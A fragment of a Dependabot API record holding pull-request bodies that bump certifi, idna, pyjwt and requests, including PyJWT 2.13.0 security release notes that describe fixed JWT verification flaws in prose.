href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\n[![Dependabot compatibility score](https://dependabot-badges.githubapp.com/badges/compatibility_score?dependency-name=pyjwt\u0026package-manager=uv\u0026previous-version=2.12.1\u0026new-version=2.13.0)](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)\n\n\n\u003c/details\u003e","html_url":"https://github.com/fractal-analytics-platform/fractal-client/pull/904","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/fractal-analytics-platform%2Ffractal-client/issues/904","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/904/packages"}},{"old_version":"2.12.1","new_version":"2.13.0","update_type":"minor","path":null,"pr_created_at":"2026-06-02T14:20:25.000Z","version_change":"2.12.1 → 2.13.0","issue":{"uuid":"4572247711","node_id":"PR_kwDOHpFAes7h1B0o","number":1800,"state":"open","title":"chore(deps): bump the pip-demo-deps group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-02T14:20:25.000Z","updated_at":"2026-06-02T14:37:52.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"pip-demo-deps","update_count":4,"packages":[{"name":"certifi","old_version":"2026.4.22","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"idna","old_version":"3.15","new_version":"3.17","repository_url":"https://github.com/kjd/idna"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"requests","old_version":"2.34.0","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip-demo-deps group with 4 updates in the /examples/st-oid4vci/demo directory: [certifi](https://github.com/certifi/python-certifi), [idna](https://github.com/kjd/idna), [pyjwt](https://github.com/jpadilla/pyjwt) and [requests](https://github.com/psf/requests).\n\nUpdates `certifi` from 2026.4.22 to 2026.5.20\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/d7ea151afc2ce6bef0555b9349902bd867e928dd\"\u003e\u003ccode\u003ed7ea151\u003c/code\u003e\u003c/a\u003e 2026.05.20 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/413\"\u003e#413\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2026.04.22...2026.05.20\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.15 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.15...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\n\u003c/code\u003e\u003c/pre\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.34.0 to 2.34.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.34.2\u003c/h2\u003e\n\u003ch2\u003e2.34.2 